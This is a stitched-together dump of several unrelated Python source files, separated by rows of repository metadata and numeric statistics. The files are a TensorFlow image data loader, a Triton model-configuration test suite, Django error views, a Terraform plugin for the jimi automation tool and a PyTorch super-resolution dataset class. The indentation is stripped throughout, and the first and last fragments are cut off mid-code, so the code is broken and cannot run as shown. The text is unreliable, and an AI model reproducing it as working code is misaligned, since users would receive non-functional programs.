raise NotImplementedError
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), shuffle=False, seed=42
)
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
test_ds = prepare_for_testing(ds)
return test_ds
def get_plot_data(self):
def preprocess_input(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_png(FILE)
label = tf.strings.split(path, os.path.sep)[-2]
return img, label
def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
label = tf.strings.split(path, os.path.sep)[-2]
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def prepare_for_testing(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=1000,
):
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(shuffle_buffer_size)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), shuffle=False, seed=42
)
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
plot_ds = prepare_for_testing(ds)
return plot_ds
@staticmethod
def normalize(input_image, real_image):
# normalize between [-1, 1] if using tanh activation
input_image = (input_image / 0.5) - 1
if real_image:
real_image = (real_image / 0.5) - 1
return input_image, real_image
else:
return input_image, real_image
@staticmethod
def resize(input_image, real_image, height=256, width=256):
input_image = tf.image.resize(
input_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR
)
real_image = tf.image.resize(
real_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR
)
return input_image, real_image
@staticmethod
def random_crop(input_image, real_image, img_height, img_width):
stacked_image = tf.stack([input_image, real_image], axis=0)
cropped_image = tf.image.random_crop(
stacked_image, size=[2, img_height, img_width, 3]
)
return cropped_image[0], cropped_image[1]
@tf.function()
def random_jitter(self, input_image, real_image):
input_image, real_image = self.resize(input_image, real_image, 384, 384)
# randomly cropping to 256 x 256 x 3
input_image, real_image = self.random_crop(
input_image,
real_image,
self.config.model.input_shape[0],
self.config.model.input_shape[1],
)
if tf.random.uniform((), dtype=tf.float16) > 0.5:
# random mirroring
input_image = tf.image.flip_left_right(input_image)
real_image = tf.image.flip_left_right(real_image)
return input_image, real_image
| 36.68894 | 87 | 0.538969 | 1,806 | 15,923 | 4.553156 | 0.112957 | 0.065669 | 0.074912 | 0.107017 | 0.825003 | 0.789979 | 0.757388 | 0.747659 | 0.747659 | 0.730026 | 0 | 0.016231 | 0.361552 | 15,923 | 433 | 88 | 36.773672 | 0.792642 | 0.052817 | 0 | 0.707463 | 0 | 0 | 0.015348 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056716 | false | 0 | 0.014925 | 0 | 0.131343 | 0.002985 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
747b7b2afc29617b4b889654e9aae917761378af | 15,656 | py | Python | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 49 | 2021-04-09T18:32:07.000Z | 2022-03-29T07:32:24.000Z | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2021-07-13T09:00:12.000Z | 2021-11-15T17:16:35.000Z | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2021-04-09T18:31:56.000Z | 2022-03-01T08:08:04.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
from tempfile import TemporaryDirectory
import numpy as np
import pytest
from model_navigator.common.config import TensorRTCommonConfig
from model_navigator.model import Model, ModelSignatureConfig
from model_navigator.tensor import TensorSpec
from model_navigator.triton.config import (
Batching,
DeviceKind,
TritonBatchingConfig,
TritonCustomBackendParametersConfig,
TritonDynamicBatchingConfig,
TritonModelInstancesConfig,
TritonModelOptimizationConfig,
)
from model_navigator.triton.model_config import TritonModelConfigGenerator
CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES = (
128,
"model.pt",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, 224, 224), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_DYNAMIC_AXES = (
128,
"model.pt",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, -1, -1), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES = (
128,
"model.plan",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, 224, 224), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES = (
128,
"model.plan",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, -1, -1), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_for_torchscript(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_for_tensorrt_plan(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
# assert parsed_model_config_generator.backend_parameters_config == backend_parameters_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_static_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.STATIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_disabled_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DISABLED)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
batching_config.max_batch_size = 0
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_dynamic_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DYNAMIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
dynamic_batching_config.preferred_batch_sizes = [max_batch_size]
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_dynamic_batching_configured(
monkeypatch, max_batch_size, model_filename, signature
):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DYNAMIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig(preferred_batch_sizes=[1, 2], max_queue_delay_us=100)
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
| 47.586626 | 119 | 0.756515 | 1,713 | 15,656 | 6.466433 | 0.095738 | 0.073305 | 0.084861 | 0.082152 | 0.897535 | 0.897535 | 0.891035 | 0.891035 | 0.876411 | 0.874063 | 0 | 0.008837 | 0.176035 | 15,656 | 328 | 120 | 47.731707 | 0.849845 | 0.058763 | 0 | 0.804598 | 0 | 0 | 0.034251 | 0.015902 | 0 | 0 | 0 | 0 | 0.10728 | 1 | 0.022989 | false | 0.022989 | 0.034483 | 0 | 0.057471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
776919ae875614f3c35f35d47f9d9c811af34633 | 195 | py | Python | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | from django.shortcuts import render
def page_not_found(request, exception):
return render(request, 'misc/404.html')
def server_error(request):
return render(request, 'misc/500.html')
| 19.5 | 43 | 0.748718 | 27 | 195 | 5.296296 | 0.666667 | 0.167832 | 0.265734 | 0.321678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.138462 | 195 | 9 | 44 | 21.666667 | 0.815476 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
77fd9ffcb73e5a1c05a856e017eb4598de9bc638 | 3,062 | py | Python | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | null | null | null | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | null | null | null | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | 2 | 2021-11-24T12:21:54.000Z | 2022-02-14T23:43:40.000Z | from pathlib import Path
import uuid
from python_terraform import *
import jimi
class _terraformInit(jimi.action._action):
terraform_dir = str()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
return_code, stdout, stderr = t.init()
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr }
class _terraformPlan(jimi.action._action):
terraform_dir = str()
terraform_vars = dict()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_vars = jimi.helpers.evalDict(self.terraform_vars,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
out = str(uuid.uuid4())
return_code, stdout, stderr = t.plan(var=terraform_vars,out=out)
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr, "plan_out" : out }
class _terraformApply(jimi.action._action):
terraform_dir = str()
terraform_vars = dict()
terraform_plan = str()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_plan = jimi.helpers.evalString(self.terraform_plan,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_vars = jimi.helpers.evalDict(self.terraform_vars,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
if terraform_plan:
return_code, stdout, stderr = t.apply(terraform_plan,var=terraform_vars)
else:
return_code, stdout, stderr = t.apply(var=terraform_vars)
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr }
| 62.489796 | 212 | 0.666231 | 339 | 3,062 | 5.879056 | 0.159292 | 0.090316 | 0.048169 | 0.075263 | 0.869042 | 0.828901 | 0.786754 | 0.786754 | 0.786754 | 0.738585 | 0 | 0.003953 | 0.173743 | 3,062 | 48 | 213 | 63.791667 | 0.783794 | 0 | 0 | 0.585366 | 0 | 0 | 0.223057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.097561 | 0 | 0.536585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7ae1ebeaf832e61a69d8b6ab70defc13eff5c1b0 | 12,547 | py | Python | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 9 | 2021-03-29T12:32:37.000Z | 2022-01-16T15:44:27.000Z | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 2 | 2021-07-05T03:07:26.000Z | 2021-07-15T13:22:26.000Z | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 1 | 2021-11-05T16:03:35.000Z | 2021-11-05T16:03:35.000Z | #!/usr/bin/env python
# coding=utf-8
'''
@Author: wjm
@Date: 2019-10-23 14:57:22
@LastEditTime: 2020-06-30 19:31:07
@Description: file content
'''
import torch.utils.data as data
import torch, random, os
import numpy as np
from os import listdir
from os.path import join
from PIL import Image, ImageOps
from random import randrange
def is_image_file(filename):
return any(filename.endswith(extension) for extension in ['.jpg', '.JPG', '.jpeg', '.JPEG', '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',])
def load_img(filepath):
img = Image.open(filepath).convert('RGB')
#img = Image.open(filepath)
#y, _, _ = img.split()
return img
def rescale_img(img_in, scale):
size_in = img_in.size
new_size_in = tuple([int(x * scale) for x in size_in])
img_in = img_in.resize(new_size_in, resample=Image.BICUBIC)
return img_in
def get_patch(img_in, img_tar, img_bic, patch_size, scale, ix=-1, iy=-1):
(ih, iw) = img_in.size
(th, tw) = (scale * ih, scale * iw)
patch_mult = scale #if len(scale) > 1 else 1
tp = patch_mult * patch_size
ip = tp // scale
if ix == -1:
ix = random.randrange(0, iw - ip + 1)
if iy == -1:
iy = random.randrange(0, ih - ip + 1)
(tx, ty) = (scale * ix, scale * iy)
img_in = img_in.crop((iy,ix,iy + ip, ix + ip))
img_tar = img_tar.crop((ty,tx,ty + tp, tx + tp))
img_bic = img_bic.crop((ty,tx,ty + tp, tx + tp))
info_patch = {
'ix': ix, 'iy': iy, 'ip': ip, 'tx': tx, 'ty': ty, 'tp': tp}
return img_in, img_tar, img_bic, info_patch
def get_patch_ref(img_in, img_tar, img_bic, img_in_ref, img_tar_ref, img_bic_ref, patch_size, scale, ix=-1, iy=-1):
(ih, iw) = img_in.size
(th, tw) = (scale * ih, scale * iw)
patch_mult = scale #if len(scale) > 1 else 1
tp = patch_mult * patch_size
ip = tp // scale
if ix == -1:
ix = random.randrange(0, iw - ip + 1)
if iy == -1:
iy = random.randrange(0, ih - ip + 1)
(tx, ty) = (scale * ix, scale * iy)
img_in = img_in.crop((iy,ix,iy + ip, ix + ip))
img_tar = img_tar.crop((ty,tx,ty + tp, tx + tp))
img_bic = img_bic.crop((ty,tx,ty + tp, tx + tp))
img_in_ref = img_in_ref.crop((iy,ix,iy + ip, ix + ip))
img_tar_ref = img_tar_ref.crop((ty,tx,ty + tp, tx + tp))
img_bic_ref = img_bic_ref.crop((ty,tx,ty + tp, tx + tp))
info_patch = {
'ix': ix, 'iy': iy, 'ip': ip, 'tx': tx, 'ty': ty, 'tp': tp}
return img_in, img_tar, img_bic, img_in_ref, img_tar_ref, img_bic_ref, info_patch
def augment(img_in, img_tar, img_bic, flip_h=True, rot=True):
info_aug = {'flip_h': False, 'flip_v': False, 'trans': False}
if random.random() < 0.5 and flip_h:
img_in = ImageOps.flip(img_in)
img_tar = ImageOps.flip(img_tar)
img_bic = ImageOps.flip(img_bic)
info_aug['flip_h'] = True
if rot:
if random.random() < 0.5:
img_in = ImageOps.mirror(img_in)
img_tar = ImageOps.mirror(img_tar)
img_bic = ImageOps.mirror(img_bic)
info_aug['flip_v'] = True
if random.random() < 0.5:
img_in = img_in.rotate(180)
img_tar = img_tar.rotate(180)
img_bic = img_bic.rotate(180)
info_aug['trans'] = True
return img_in, img_tar, img_bic, info_aug
class Data(data.Dataset):
def __init__(self, image_dir, image_dir_ref, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.image_filenames_ref = [join(image_dir_ref, x) for x in listdir(image_dir_ref) if is_image_file(x)]
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
target_ref = load_img(self.image_filenames_ref[index])
_, file_ref = os.path.split(self.image_filenames_ref[index])
target_ref = target_ref.crop((0, 0, target_ref.size[0] // self.upscale_factor * self.upscale_factor, target_ref.size[1] // self.upscale_factor * self.upscale_factor))
input_ref = target_ref.resize((int(target_ref.size[0]/self.upscale_factor),int(target_ref.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic_ref = rescale_img(input_ref, self.upscale_factor)
input, target, bicubic, input_ref, target_ref, bicubic_ref, _ = get_patch_ref(input,target,bicubic,input_ref,target_ref,bicubic_ref,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
input_ref = self.transform(input_ref)
bicubic_ref = self.transform(bicubic_ref)
target_ref = self.transform(target_ref)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
